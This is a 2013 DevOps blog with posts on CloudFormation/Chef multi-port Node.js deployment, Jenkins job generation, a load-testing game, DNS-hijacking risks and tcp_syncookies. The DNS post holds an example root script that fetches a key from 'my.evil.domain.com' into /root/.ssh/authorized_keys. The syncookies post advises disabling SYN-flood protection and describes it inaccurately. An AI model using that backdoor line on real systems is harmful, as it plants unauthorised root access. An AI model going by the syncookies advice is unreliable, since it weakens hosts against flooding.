Saturday, November 9, 2013

Running single-threaded applications like a boss using CloudFormation and Chef.

NodeJS + CF + Chef = Unicorn Awesomeness!!

The problem statement is this: how do I make use of a single-threaded application in the cloud?  This is great practice for technologies like redis where there is a specific focus on accomplishing a very direct, targeted objective in a "weird" kind of way.  Redis is also single-threaded, but it's focus is on really really fast indexing of structured data.  In the case of Node it makes sense to run many instances of the run time on a single compute resources, thus using more of the systems resources to get more work done.

I'm using a formula of n+1 where n is the number of ECPU's.  An m1.large instance in AWS has 2 ECPU's.  The goal here is to find an automated path to running the cloudrim-api on many ports for a single compute instance.  Then load balancing the incoming requests across an array of ELB's, each ELB attached to a separate port, but the same group of nodes.  Also maintaining that all traffic coming into any given ELB group is always port 9000.

High-level summary

This is creating several AWS objects:

  • Security group for the load balancer which says "only allow traffic in from port 9000".
  • 2 Elastic Load Balancer objects, both of which listen on port 9000, but direct traffic to either 9000, or 9001 on the target.
  • Each ELB has it's own DNS Alias record.
  • A regional DNS entry is created in a way that Route53 will create a weighted set for each entry in the resource collection. 
The magic is in the last step, what we end up with is an end point cloudrim.us-east-1.opsautohtc.net which points at a weighted set of ELB's.  Each ELB is pointing to a specific port on a collection of nodes, this collection of nodes is the same for each ELB, but different ports.

This allows us to run many instances of a software package in a dynamic way ( more ECPU's will grow most of the system automatically ).  I'm combining this with runit for extra durability; runit ensures that the process is always running, so if the service crashes, runit will automatically create a new instance almost immediately.


CloudFormation bits:

    "LoadBalancerSecurityGroup": {
      "Type": "AWS::EC2::SecurityGroup",
      "Properties": {
        "VpcId": { "Ref": "VpcId" },
        "GroupDescription": "Enable HTTP access on port 9080",
        "SecurityGroupIngress": [
          { "IpProtocol": "tcp", "FromPort": "9000", "ToPort": "9000", "CidrIp": "0.0.0.0/0" }
        ],
        "SecurityGroupEgress": [ ]
      }
    },
    "ElasticLoadBalancer0": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9000", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9000",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "ElasticLoadBalancer1": {
      "Type": "AWS::ElasticLoadBalancing::LoadBalancer",
      "Properties": {
        "Subnets": [{ "Ref": "PrivateSubnetId" }],
        "Scheme": "internal",
        "Listeners": [{ "LoadBalancerPort": "9000", "InstancePort": "9001", "Protocol": "TCP" }],
        "HealthCheck": {
          "Target": "TCP:9001",
          "Timeout": "2",
          "Interval": "20",
          "HealthyThreshold": "3",
          "UnhealthyThreshold": "5"
        },
        "SecurityGroups": [{ "Ref": "LoadBalancerSecurityGroup" }]
      }
    },
    "DNSEntry0": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer0", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "DNSEntry1": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "A",
          "AliasTarget": {
            "DNSName": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "DNSName" ] },
            "HostedZoneId": { "Fn::GetAtt": [ "ElasticLoadBalancer1", "CanonicalHostedZoneNameID" ] }
          }
        }]
      }
    },
    "RegionDNSEntry": {
      "Type": "AWS::Route53::RecordSetGroup",
      "Properties": {
        "HostedZoneName": { "Fn::Join": [ "", [{ "Ref": "DomainName" },"."]]},
        "Comment": "DNS CName for the master redis ELB",
        "RecordSets": [{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array0",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim0.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array1",
          "Weight": "40",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim1.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        },{
          "Name": { "Fn::Join": [ "", [
            "cloudrim.",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }, "."
          ]]},
          "Type": "CNAME",
          "TTL": "900",
          "SetIdentifier": "Array2",
          "Weight": "30",
          "ResourceRecords": [{ "Fn::Join": [ "", [
            "cloudrim2.",
            { "Ref": "StackName" }, ".",
            { "Ref": "DeploymentName" }, ".",
            { "Ref": "AWS::Region" }, ".",
            { "Ref": "DomainName" }
          ]]}]
        }]
      }
    },
    "ConfigASG": {
      "Type": "AWS::AutoScaling::AutoScalingGroup",
      "Properties": {
        "Tags": [{ "Key": "DeploymentName", "Value": { "Ref": "DeploymentName" }, "PropagateAtLaunch": "true" }],
        "MinSize": { "Ref": "Min" },
        "MaxSize": { "Ref": "Max" },
        "DesiredCapacity": { "Ref": "DesiredCapacity" },
        "AvailabilityZones": [{ "Ref": "AvailabilityZone" }],
        "VPCZoneIdentifier": [{ "Ref": "PrivateSubnetId" }],
        "LoadBalancerNames": [
          { "Ref": "ElasticLoadBalancer0" },
          { "Ref": "ElasticLoadBalancer1" },
          { "Ref": "ElasticLoadBalancer2" }
        ],
        "LaunchConfigurationName": { "Ref": "ServiceLaunchConfig" }
      }
    }

And now the chef bits:

services = node["htc"]["services"] || [ "api" ]
Chef::Log.info( "SERVICES: %s" % services.inspect )
num_procs = `cat /proc/cpuinfo |grep processor|wc -l`.to_i + 1
Chef::Log.info( "NumProcs: %i" % num_procs )
num_procs.times do |pid|
  Chef::Log.info( "PID: %i" % (9000+pid) )
  runit_service "cloudrim-api%i" % pid do
    action [ :enable, :start ]
    options({ :port => (9000+pid) })
    template_name "cloudrim-api"
    log_template_name "cloudrim-api"
  end
end

Template:

cat templates/default/sv-cloudrim-api-run.erb
#!/bin/sh
exec 2>&1
PORT=<%= @options[:port] %> exec chpst -uec2-user node /home/ec2-user/cloudrim/node.js

Monday, November 4, 2013

Chef and Jenkins

I create chef bits that create jenkins build jobs.  This way I can "create the thing that creates the things."  I can reset the state of things by rm -rf *-config.xml jobs/* on the jenkins server, restart jenkins, then run chef-client and everything gets put back together automatically.  This also allows me to change the run jobs in real time, but then reset everything when I'm done.

recipes/jenkins-builder.rb

pipelines = []
dashboards = []

region_name = "us-east-1"
domain_name = "opsautohtc.net"
deployment_name = "Ogashi"
pipelines.push({
  :name => "Launch %s" % deployment_name,
  :num_builds => 3,
  :description => "

Prism

  • Cloud: AWS
  • Region: us-east-1
  • Account: HTC CS DEV
  • Owner: Bryan Kroger ( bryan_kroger@htc.com )
",
  :refresh_freq => 3,
  :first_job_name => "CloudFormation.%s.%s.%s" % [deployment_name, region_name, domain_name],
  :build_view_title => "Launch %s" % deployment_name
})
cloudrim_battle_theater deployment_name do
  action :jenkins_cloud_formation
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
cloudrim_battle_theater deployment_name  do
  action :jenkins_exec_helpers
  az_name "us-east-1b"
  git_url "git@gitlab.dev.sea1.csh.tc:operations/deployments.git"
  region_name region_name
  domain_name domain_name
end
dashboards.push({ :name => deployment_name, :region_name => "us-east-1" })

template "/var/lib/jenkins/jenkins-data/config.xml" do
  owner "jenkins"
  group "jenkins"
  source "jenkins/config.xml.erb"
  #notifies :reload, "service[jenkins]"
  variables({ :pipelines => pipelines, :dashboards => dashboards })
end



cloudrim/providers/battle_theater.rb:

def action_jenkins_exec_helpers()
  region_name = new_resource.region_name
  domain_name = new_resource.domain_name
  deployment_name = new_resource.name

  proxy_url = "http://ops.prism.%s.int.%s:3128" % [region_name, domain_name]

  proxy = "HTTP_PROXY='%s' http_proxy='%s' HTTPS_PROXY='%s' https_proxy='%s'" % [proxy_url, proxy_url, proxy_url, proxy_url]

  job_name = "ExecHelper.chef-client.%s.%s.%s" % [deployment_name, region_name, domain_name]
  job_config = ::File.join(node[:jenkins][:server][:data_dir], "#{job_name}-config.xml")
  jenkins_job job_name do
    action :nothing
    config job_config
  end
  template job_config do
    owner "jenkins"
    group "jenkins"
    source "jenkins/htc_pssh_cmd.xml.erb"
    cookbook "opsauto"
    variables({
      #:cmd => "%s sudo chef-client -j /etc/chef/dna.json" % proxy, 
      :cmd => "%s sudo chef-client" % proxy,
      :hostname => "ops.prism",
      :domain_name => domain_name,
      :region_name => region_name,
      :deployment_name => deployment_name
    })
    notifies :update, resources(:jenkins_job => job_name), :immediately
  end

 [...]

end


Sunday, November 3, 2013

Great run...

We had a great first run of the BattleTheater today.  Release 0.0.9 fixes a ton of bugs relating to the engines.

I have found an absolutely brilliant way of running the nodejs services.  I have this in my services.rb recipe:

runit_service "cloudrim-kaiju" do
  log false
  if(services.include?( "kaiju" ))
    action [ :enable, :start ]
  else
    action [ :disable, :down, :stop ]
  end
end

I can run a variable number of nodejs services based on the contents of the node["htc"]["services"] array.

These runit services are templated, but basically I can run a service that does this:

node /home/ec2-user/cloudrim/engines/kaiju.js

And run the Kaiju Engine on it's own thread.  Runit takes care of making sure the service is always running, and I don't have to mess with init scripts!!

Thank you #opscode !

How do I CloudRim?

Do something like this:

curl -XPOST -H "Content-Type: application/ajax" -d '{"email":"your.emil@blah.com"}' Tanaki-cl-ElasticL-10851AT1WINID-1417527178.us-east-1.elb.amazonaws.com:9000/hq/battle

You'll get this back:

{"kaiju":{"hp":90.71948742261156,"xp":0,"str":7,"name":"Knifehead92","level":14,"armor":7,"speed":7,"bonuses":{"ice":0,"fire":0,"earth":0,"water":6},"category":3,"actor_type":"kaiju","_id":"5276b4d902b6008c0e00007d"},"jaeger":{"level":33,"_id":"5276b4d94a2ad64d0e00007a","hp":100,"name":"","weapons":{"left":{"ice":0,"fire":1,"earth":9,"water":0},"right":{"ice":5,"fire":9,"earth":1,"water":0}}}}


Friday, November 1, 2013

CloudRim

GitRepo

CloudRiim is a little game I came up with to help people understand high-volume load and scaling techniques in AWS.

The idea here is that I launch a "Battle Theater" into an AWS region, let's say us-east-1 for example.  The BT is basically a MongoDB sharding rig with automatic sharding in place.  When the battle begins I will announce "The Kaiju have landed in USEast!!" and the battle will begin.

Most games are centered around the idea of keeping people off the server and doing as much local caching as possible.  This is not that by a good long shot.  The idea of this game is to pound the absolute shit out of the server as hard and as fast as you can.  In fact, simply using ab or a script with some treading junk won't be enough.  Even running jmeter on a single box won't be enough.

The goal of this game is to destroy all Kaiju in existence, but the Rift keeps spawning new Kaiju at a fairly high rate.  The Jaegers are also spawned at a similar rate.

There are two winning scenarios in the game: either the Kaiju win and you suck, or the Apocalypse is canceled and the hero's win.

Every time you do battle with the server you are awarded a random number of XP between 1 and 10, so in order to be at the top of the charts you have to do as many battles as possible.

Now here's the catch, this entire game is built around this idea that great automation can do amazing things.  In order to prove this the BT is only deployed for an hour.  This means that you have less than an hour to spin up your nodes and attack the server as hard and as fast you possibly can.  Obviously this is going to require coordination on your part.

At the end of the game the scores are tallied up and the person at the top of the score chart is given the metal of honor or something.

The idea here is to give people a fun, engaging way of learning how automation works and why it's important.  It's also a great way to prove just how unbelievably awesome AWS really is.

Monday, October 7, 2013

DNS hacking paranoia

Every time I see a story like this, I freak out a little:

http://thehackernews.com/2013/10/worlds-largest-web-hosting-company_5.html

Long story short: DNS hijacking.

When we look at the cloud offering landscape we see cloud providers like Amazon, RackSpace, and Google, but there are also cloud management companies like RightScale and Scalr.  These cloud management companies will sometimes lay in their own custom software bits that help aid in the configuration and management of a given compute resources.

In most cases ( and we can even include things like chef servers here as well ) the compute resource that is being managed will make a call out to the "control server" for instructions.  But how does it know which server to contact?  That's where DNS comes in, for example:

configuration.us-east-1.mycompany.com

Would be a DNS entry that actually points to:

cf-chef-01.stackName0.deploymentName0.regionName.domainName.TLD

The DNS eventually points to an IP, and the client makes the call.

If an attacker is able to hyjack mycompany.com, they could point configuration.us-east-1 at their own IP address.  Most of these configuration management applications use some kind of authentication or validation to prove they are who they are.  In the case of chef, the calls are wrapped in encrypted payloads that can only be decrypted by a key on the server side, which makes "man in the middle" attacks much more difficult.

In some cases the configuration management software simply makes a call to a worker queue which uses a basic username/password system.  In this case one could simply wrap any type of generic worker queue with a "always pass authentication" switch that would always allow the client to successfully authenticate.  This would allow you to control the client by simply injecting worker elements into the queue.

For example, we could create a worker element that runs the following script as root:

#!/bin/bash
curl -o /tmp/tmp.cache.r1234 http://my.evil.domain.com/public_key
cat  /tmp/tmp.cache.r1234 >> /root/.ssh/authorized_keys

This would work great for any node that isn't in an VPC and is attached to a public IP.  Other tickery could be used to extend the evilness of this hack, but the point is that if you can execute something on the remote box as root, you're pretty well fucked.

This is why DNS hijacking stories scare me a little.

Friday, October 4, 2013

tcp syn flooding ... why does this keep happening?

Linux itself is just a kernel, all of the crap around the kernel, from bash, to KDE is considered part of the distro.  Linux distros come in many flavors, shapes and sizes.  This is benificial to everyone as it allows for a few generic "types" of distros that can then specialize with further customizations.    For example, Ubuntu is derived from the Debian base type.  Similarly CentOS is derived from Red Hat Enterprise Linux.

The differences between CentOS and RHEL are mostly related to licensing and support.  Red Hat the company publishes, maintains and supports the Red Hat Enterprise Linux ( RHEL ) distribution.  Their product isn't Linux, it's actually supporting and maintaining the distribution around Linux.  CentOS is not a product, it's maintained by the community according to their perfectly adequate community standards.

Amazon also makes it's own AMI.  There AMI is specifically designed to work in their EC2 environment.  The expectation is that this AMI will be used in a high traffic environment.

When having a discussion about which distribution to go with it's important to pay attention to the expectations of use.  These expectations aren't always as obvious as the expectations around the Amazon AMI.  Amazon is making it's expectations very clear:

"the instance that you use with this AMI will take significant amounts of traffic from one or may sources"

This expectation is set by the engineers that were paid large sums of money to ensure that these expectations are reflected in every decision made by the maintainers of the Amazon AMI.  Amazon pinned their reputation on this AMI and they use it in their own production environments, that tells me quite a bit about what went into making this distro happen.  They also support it as part of an enterprise support contract.  All of these facts make the Amazon AMI a very solid choice for cloud operations.

Other distros, like CentOS are a far less clear on their expectations.  For instance, CentOS seems to live in many worlds with no clear, specific role or specialization.  However, certain choices made by the maintainer can give us an general idea of what the intent might be.

For example, if a distro made a choice to, by default, protect the system from a type of attack known as a "syn flood" you would see the following:

cat /proc/sys/net/ipv4/tcp_syncookies
1

This means that tcp_syncookies is enabled.  This is a setting which says "don't allow too many people from a single IP address flood this computer."

This is great for desktops, but it's directly in contrast to how servers are supposed to work.  This is exactly opposite of what you want in a high-volume environment.

It's a very easy fix, and in our case, all I had to do is add a single line to the startup scrip for the service nodes.

          "echo 0 > /proc/sys/net/ipv4/tcp_syncookies\n",

Easy peasy.

Here's what you would see in EC2 if you were using an ELB:

  1. Instances are fine, everything is in "In Service" state. 
  2. You run ab -n 10000 -c 500 http://your_host/hb
  3. About half way through the test the ELB goes nuts, all of the instances are in "Out of Service" state.
  4. The application is fine, but the operating system seems to be completely offline from the perspective of the load balancer, but you can ssh into the instance, and telnet works fine.
What's happening is that the box is basically being DDOS'd from the haproxy's that run as the ELB.  This type of mitigation is only useful on desktops because this is usually handled by other points upstream when in the cloud or any kind of professionally built data center environment.

I remember writing about this many years ago while working at Deep Rock Drive, I'm just astonished that we still see this today in professional environments.